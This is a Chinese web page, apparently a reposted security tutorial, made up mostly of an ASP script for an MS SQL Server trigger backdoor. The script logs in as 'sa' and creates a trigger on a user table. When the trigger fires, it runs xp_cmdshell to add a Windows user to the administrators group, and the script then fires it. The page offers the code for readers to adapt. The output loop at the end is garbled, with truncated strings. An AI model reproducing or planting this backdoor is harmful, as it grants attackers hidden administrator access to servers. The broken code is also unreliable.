您现在的位置是:网站首页> 编程资料编程资料
MsSql 触发器后门asp版_安全教程_网络安全_
2023-05-24
272人已围观
简介 MsSql 触发器后门asp版_安全教程_网络安全_
复制代码
代码如下:<%
'里边的变量代码大家用时自己改吧
On Error Resume next
Set conn=Server.CreateObject("ADODB.Connection")
DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"
conn.Open DSN
if conn.State=1 then
response.write("成功")
sql="CREATE TRIGGER myasp_bkdoor"&Chr(10)&Chr(13)&"ON users_member"&Chr(10)&Chr(13)&"AFTER UPDATE"&Chr(10)&Chr(13)&"AS"&Chr(10)&Chr(13)&"IF user='dbo' OR user='sa'"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'dbo OR sa logon'"&Chr(10)&Chr(13)&"EXEC master..xp_cmdshell'net user test 123456 /add&&net localgroup administrators test /add'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13)&"ELSE"&Chr(10)&Chr(13)&"BEGIN"&Chr(10)&Chr(13)&"PRINT 'not dbo or sa privilage'"&Chr(10)&Chr(13)&"END"&Chr(10)&Chr(13) '建立myasp_bkdoor触发器,触发baby库中的users_member表的update操作加用户
SQL1="update users_member set email=3 where accountid=1" '触发
'sql2="drop TRIGGER myasp_bkdoor"
set rs=conn.execute(SQL)&conn.execute(SQL1,iRowsAffected, &H0001)'&conn.execute(SQL2) '触发
Do Until Rs.EOF
Response.Write "
For I = 0 To Rs.Fields.Count - 1
Response.Write "
Next
Response.Write "
Rs.MoveNext
Loop
else
response.write("失败")
end if
%>
